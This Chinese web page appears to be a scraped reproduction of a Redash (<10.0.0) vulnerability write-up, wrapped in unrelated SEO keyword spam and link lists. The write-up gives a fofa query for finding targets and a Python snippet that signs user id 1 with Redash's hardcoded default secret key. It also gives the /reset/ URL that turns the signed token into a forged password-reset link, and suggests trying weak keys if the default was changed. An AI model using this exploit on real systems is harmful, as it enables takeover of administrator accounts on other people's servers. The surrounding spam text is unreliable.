当前位置: 首页 > news >正文

荆门网站制作搜索引擎优化的核心本质

荆门网站制作,搜索引擎优化的核心本质,住宅和城乡建设部网站,做网站用什么系统Redash是以色列Redash公司的一套数据整合分析解决方案。该产品支持数据整合、数据可视化、查询编辑和数据共享等。 Redash 10.0.0及之前版本存在安全漏洞,攻击者可利用该漏洞来使用已知的默认值伪造会话。 1.漏洞级别 中危 2.漏洞搜索 fofa "redash"…

Redash是以色列Redash公司的一套数据整合分析解决方案。该产品支持数据整合、数据可视化、查询编辑和数据共享等。 Redash 10.0.0及之前版本存在安全漏洞,攻击者可利用该漏洞来使用已知的默认值伪造会话。

1.漏洞级别

中危

2.漏洞搜索

fofa

"redash"

3.影响范围

Redash < 10.0.0

4.漏洞复现

漏洞的产生主要原因是由于redash这个项目的token生成方式存在默认key,如果用户不手动修改的话,我们就可以利用他来生成一个有效的token。由于该产品的找回密码功能是通过用户的自增id生成token,因此我们可以直接生成一个有效的找回链接。
可以执行如下python代码

from itsdangerous import URLSafeTimedSerializer
if __name__ == "__main__":serializer = URLSafeTimedSerializer("c292a0a3aa32397cdb050e233733900f")key = serializer.dumps("1")print(key)
生成的有效负载:
IjEi.ZbIBdw.mxvud9Tkz_jfJ6UrVoVuffSxl18
  • 由于生成的有效负载存在过期时间,因此每次测试的时候最好重新生成一下。
  • "c292a0a3aa32397cdb050e233733900f"为默认key。如果用户手动修改了这个key,我们也可以尝试使用一些弱口令来生成负载尝试一下。
    访问路径
url/reset/IjEi.ZbIBdw.mxvud9Tkz_jfJ6UrVoVuffSxl18

如果出现即为漏洞存在
在这里插入图片描述
出现这个表示key已被修改过了
在这里插入图片描述
到这里漏洞就复现成功了。
如果有问题欢迎随时沟通~

在这里插入图片描述

http://www.yidumall.com/news/15714.html

相关文章:

  • 网站的站长是什么意思百度关键词查询排名
  • wordpress 目录404如何优化关键词搜索排名
  • 网站管理后台文章排序指数函数和对数函数
  • 波兰 政府网站建设成都网站seo排名优化
  • 用友加密狗注册网站seo优化设计
  • 鼓楼区建设房产和交通局网站百度知道网页版进入
  • wordpress oracleseo排名赚能赚钱吗
  • pc官网 和手机网站惠州网络推广平台
  • 安徽网站建设费用通过百度指数不能判断出
  • 套模板做网站电话关于进一步优化落实疫情防控措施
  • wordpress教育类主题长沙网站优化排名推广
  • 做愛4p視頻网站是什么百度推广的广告靠谱吗
  • java和php哪个做网站好市场调研报告范文2000
  • 天津实用网站建设百度百家号官网登录
  • 做车品的网站营销型网站建设设计
  • 信息门户网站建设报价新闻稿
  • 石家庄新钥匙网站建设网站优化外包公司
  • wap网站开发联系电话公司宣传推广方案
  • 桐乡建设局网站任何小说都能搜到的软件
  • 住房公积金个人提取百度搜索关键词排名优化推广
  • 旅行社营业部管理办法seo站外推广有哪些
  • 那些网站可以上传自己做的视频全自动推广软件
  • 采集做网站培训机构网站制作
  • 重庆做网站建设的公司哪家好河北百度推广电话
  • 怎样做网站seo农产品营销方案
  • 如何做网站banner迅雷bt磁力链 最好用的搜索引擎
  • 如何做一个动态网站百度一下浏览器
  • 上海监狱门户网站设计网站排行榜前十名
  • 用瀑布流做的美食网站网站推广联盟
  • 网站建设视频技术论坛百度指数批量